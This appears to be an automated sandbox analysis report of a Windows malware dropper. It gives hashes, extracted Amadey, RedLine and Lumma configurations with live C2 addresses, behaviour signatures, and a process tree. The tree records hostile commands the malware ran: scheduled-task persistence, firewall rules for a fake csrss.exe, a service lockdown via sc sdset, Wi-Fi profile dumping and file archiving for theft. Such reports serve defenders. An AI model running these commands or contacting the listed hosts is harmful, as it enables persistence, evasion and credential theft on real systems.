Analysis

  • max time kernel
    98s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-03-2024 15:07

General

  • Target

    9a1479bac1f3c4652a9b14798f3e5d2ec2cd4839ad40415d079619d21a812c64.exe

  • Size

    1.8MB

  • MD5

    31be2f115f41edc9983d957c33008b68

  • SHA1

    12a8ac48d6ca6917d872c1c96e5d277c4dd842b3

  • SHA256

    9a1479bac1f3c4652a9b14798f3e5d2ec2cd4839ad40415d079619d21a812c64

  • SHA512

    c7bb8e85167fc06cabc095a895d953c8e0a6a0eb21e23431c26a866f22e8266e989b1c273cda667836c90fce36c30ced59b46e2cce6d2d996bb2aa6ee6e41f90

  • SSDEEP

    49152:ynktmVBAjAVQLaStMDTBf0Qizoq+4Q9l80UAoxLs:k6OVupkBMQgXp

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

185.172.128.33:8970

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Jok123

C2

185.215.113.67:26260

Extracted

Family

lumma

C2

https://herdbescuitinjurywu.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 14 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 1 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 7 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 17 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2644
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:5516
    • C:\Users\Admin\AppData\Local\Temp\9a1479bac1f3c4652a9b14798f3e5d2ec2cd4839ad40415d079619d21a812c64.exe
      "C:\Users\Admin\AppData\Local\Temp\9a1479bac1f3c4652a9b14798f3e5d2ec2cd4839ad40415d079619d21a812c64.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      PID:4880
    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3160
      • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
        "C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        PID:1720
      • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
        "C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4084
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4600
          • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3764
          • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
            "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4968
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
            4⤵
              PID:5808
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 3
                5⤵
                  PID:3748
          • C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
            "C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"
            2⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2824
            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
              "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1192
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                4⤵
                • Loads dropped DLL
                PID:5284
                • C:\Windows\system32\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                  5⤵
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  PID:440
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show profiles
                    6⤵
                      PID:3720
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\660967641992_Desktop.zip' -CompressionLevel Optimal
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2768
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  PID:3292
            • C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
              "C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3092
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
              2⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:4552
              • C:\Windows\system32\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                3⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3148
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  4⤵
                    PID:2276
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\660967641992_Desktop.zip' -CompressionLevel Optimal
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4172
              • C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
                "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3300
              • C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                "C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe"
                2⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2520
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe" /F
                  3⤵
                  • Creates scheduled task(s)
                  PID:2224
              • C:\Users\Admin\AppData\Local\Temp\1001051001\un300un.exe
                "C:\Users\Admin\AppData\Local\Temp\1001051001\un300un.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3988
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                  3⤵
                    PID:3884
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                    3⤵
                      PID:3816
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:912
                      • C:\Users\Admin\Pictures\TVMzib86QJCviU3I3BOQvJf1.exe
                        "C:\Users\Admin\Pictures\TVMzib86QJCviU3I3BOQvJf1.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1672
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 1140
                          5⤵
                          • Program crash
                          PID:4568
                      • C:\Users\Admin\Pictures\9CnKgcRttvFSvtixr9pcODJO.exe
                        "C:\Users\Admin\Pictures\9CnKgcRttvFSvtixr9pcODJO.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2136
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -nologo -noprofile
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5960
                        • C:\Users\Admin\Pictures\9CnKgcRttvFSvtixr9pcODJO.exe
                          "C:\Users\Admin\Pictures\9CnKgcRttvFSvtixr9pcODJO.exe"
                          5⤵
                          • Executes dropped EXE
                          • Checks for VirtualBox DLLs, possible anti-VM trick
                          PID:316
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3764
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                            6⤵
                              PID:4208
                              • C:\Windows\system32\netsh.exe
                                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                7⤵
                                • Modifies Windows Firewall
                                PID:6000
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                                PID:972
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -nologo -noprofile
                                6⤵
                                  PID:4152
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    7⤵
                                      PID:3764
                                  • C:\Windows\rss\csrss.exe
                                    C:\Windows\rss\csrss.exe
                                    6⤵
                                      PID:3640
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        7⤵
                                          PID:5600
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                          7⤵
                                          • Creates scheduled task(s)
                                          PID:2224
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          schtasks /delete /tn ScheduledUpdate /f
                                          7⤵
                                            PID:4388
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            7⤵
                                              PID:4960
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -nologo -noprofile
                                              7⤵
                                                PID:5664
                                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                7⤵
                                                  PID:3416
                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                  7⤵
                                                  • Creates scheduled task(s)
                                                  PID:4088
                                                • C:\Windows\windefender.exe
                                                  "C:\Windows\windefender.exe"
                                                  7⤵
                                                    PID:4568
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                      8⤵
                                                        PID:6124
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                          9⤵
                                                          • Launches sc.exe
                                                          PID:5256
                                              • C:\Users\Admin\Pictures\WSZ5y35cZmLwLPVQ7ZE3rO22.exe
                                                "C:\Users\Admin\Pictures\WSZ5y35cZmLwLPVQ7ZE3rO22.exe"
                                                4⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                PID:5124
                                                • C:\Users\Admin\AppData\Local\Temp\u3yc.0.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\u3yc.0.exe"
                                                  5⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Checks processor information in registry
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5140
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\EBAKEBAECG.exe"
                                                    6⤵
                                                      PID:4792
                                                      • C:\Users\Admin\AppData\Local\Temp\EBAKEBAECG.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\EBAKEBAECG.exe"
                                                        7⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        PID:5368
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\EBAKEBAECG.exe
                                                          8⤵
                                                            PID:5372
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              9⤵
                                                                PID:5284
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 2.2.2.2 -n 1 -w 3000
                                                                9⤵
                                                                • Runs ping.exe
                                                                PID:5304
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 2376
                                                          6⤵
                                                          • Program crash
                                                          PID:1808
                                                      • C:\Users\Admin\AppData\Local\Temp\u3yc.1.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\u3yc.1.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2764
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                                          6⤵
                                                            PID:5888
                                                            • C:\Windows\SysWOW64\chcp.com
                                                              chcp 1251
                                                              7⤵
                                                                PID:4564
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                                7⤵
                                                                • Creates scheduled task(s)
                                                                PID:5932
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 420
                                                            5⤵
                                                            • Program crash
                                                            PID:5840
                                                        • C:\Users\Admin\Pictures\QEZXQA1oV2n03AwIxrB4JgD1.exe
                                                          "C:\Users\Admin\Pictures\QEZXQA1oV2n03AwIxrB4JgD1.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5272
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            5⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2000
                                                          • C:\Users\Admin\Pictures\QEZXQA1oV2n03AwIxrB4JgD1.exe
                                                            "C:\Users\Admin\Pictures\QEZXQA1oV2n03AwIxrB4JgD1.exe"
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                                            • Modifies data under HKEY_USERS
                                                            PID:4564
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              6⤵
                                                              • Drops file in System32 directory
                                                              • Modifies data under HKEY_USERS
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5920
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                              6⤵
                                                                PID:5384
                                                                • C:\Windows\system32\netsh.exe
                                                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                  7⤵
                                                                  • Modifies Windows Firewall
                                                                  PID:5664
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nologo -noprofile
                                                                6⤵
                                                                  PID:5012
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  6⤵
                                                                    PID:4084
                                                              • C:\Users\Admin\Pictures\zmPdQ82srlBB041Lp7cnUem5.exe
                                                                "C:\Users\Admin\Pictures\zmPdQ82srlBB041Lp7cnUem5.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5520
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -nologo -noprofile
                                                                  5⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3232
                                                                • C:\Users\Admin\Pictures\zmPdQ82srlBB041Lp7cnUem5.exe
                                                                  "C:\Users\Admin\Pictures\zmPdQ82srlBB041Lp7cnUem5.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                  PID:648
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -nologo -noprofile
                                                                    6⤵
                                                                    • Drops file in System32 directory
                                                                    • Modifies data under HKEY_USERS
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5576
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                    6⤵
                                                                      PID:5324
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        7⤵
                                                                          PID:440
                                                                        • C:\Windows\system32\netsh.exe
                                                                          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                          7⤵
                                                                          • Modifies Windows Firewall
                                                                          PID:4600
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -nologo -noprofile
                                                                        6⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4052
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -nologo -noprofile
                                                                        6⤵
                                                                          PID:608
                                                                    • C:\Users\Admin\Pictures\ea7QybOMTgDjA86mDhRUSE31.exe
                                                                      "C:\Users\Admin\Pictures\ea7QybOMTgDjA86mDhRUSE31.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5616
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                        5⤵
                                                                          PID:5952
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          5⤵
                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5968
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 616
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:5692
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 612
                                                                            6⤵
                                                                            • Program crash
                                                                            PID:1480
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 876
                                                                          5⤵
                                                                          • Program crash
                                                                          PID:6068
                                                                      • C:\Users\Admin\Pictures\9sP7ARHdylLLuyHx4b2PS8BU.exe
                                                                        "C:\Users\Admin\Pictures\9sP7ARHdylLLuyHx4b2PS8BU.exe"
                                                                        4⤵
                                                                        • Modifies firewall policy service
                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                        • Checks BIOS information in registry
                                                                        • Executes dropped EXE
                                                                        • Checks whether UAC is enabled
                                                                        • Drops file in System32 directory
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:5568
                                                                      • C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe
                                                                        "C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe" --silent --allusers=0
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Enumerates connected drives
                                                                        • Modifies system certificate store
                                                                        PID:60
                                                                        • C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe
                                                                          C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0x6b6ae1d0,0x6b6ae1dc,0x6b6ae1e8
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:5804
                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CnR8OFuZb8mpLgFLud2CXQU7.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CnR8OFuZb8mpLgFLud2CXQU7.exe" --version
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:5196
                                                                        • C:\Users\Admin\Pictures\CnR8OFuZb8mpLgFLud2CXQU7.exe
